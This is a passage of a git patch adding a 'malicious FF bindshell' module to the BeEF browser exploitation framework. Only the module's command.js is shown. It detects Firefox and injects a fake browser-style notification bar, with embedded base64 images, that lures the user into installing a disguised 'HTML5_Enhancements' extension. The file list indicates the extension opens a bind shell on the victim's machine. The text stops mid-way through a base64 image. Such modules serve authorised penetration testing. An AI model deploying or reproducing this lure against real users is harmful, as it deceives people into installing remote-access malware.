From 2b44c9184dc222ccdb83d7cd77d2e1e46117295d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 27 Jan 2014 07:21:44 +1030
Subject: [PATCH] Add malicious FF bindshell module

---
 .../firefox_extension_bindshell/command.js    |  38 ++++
 .../firefox_extension_bindshell/config.yaml   |  16 ++
 .../extension/HTML5_Enhancements.xpi          | Bin 0 -> 3371 bytes
 .../extension/bootstrap.js                    | 188 ++++++++++++++++++
 .../extension/build/readme.txt                |   1 +
 .../extension/chrome.manifest                 |   2 +
 .../extension/install.rdf                     |  24 +++
 .../extension/overlay.xul                     |   5 +
 .../firefox_extension_bindshell/module.rb     |  86 ++++++++
 9 files changed, 360 insertions(+)
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/command.js
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/config.yaml
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/HTML5_Enhancements.xpi
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul
 create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/module.rb

diff --git a/modules/exploits/local_host/firefox_extension_bindshell/command.js b/modules/exploits/local_host/firefox_extension_bindshell/command.js
new file mode 100644
index 000000000..61fe30df3
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/command.js
@@ -0,0 +1,38 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var xpi_name = '<%= @xpi_name %>';
+    var ff_extension = '/' + xpi_name + '.xpi';
+
+    if(beef.browser.isFF()){
+        var id = beef.dom.generateID();
+        var pid = beef.dom.generateID();
+        var zztop = beef.dom.getHighestZindex()+1;
+        var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+        var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+        var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+        $j('body').append(el);
+        var hid = '#'+id;
+        var hpid = '#'+pid;
+        $j(hid).append(elp);
+        $j(hpid).html("<%= @notification_text %>&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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